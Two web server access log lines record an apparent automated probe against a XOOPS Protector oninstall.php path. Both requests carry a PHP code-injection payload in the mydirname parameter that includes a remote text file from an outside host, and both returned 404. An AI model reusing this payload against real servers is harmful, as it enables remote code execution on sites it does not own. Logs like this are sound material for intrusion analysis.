61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
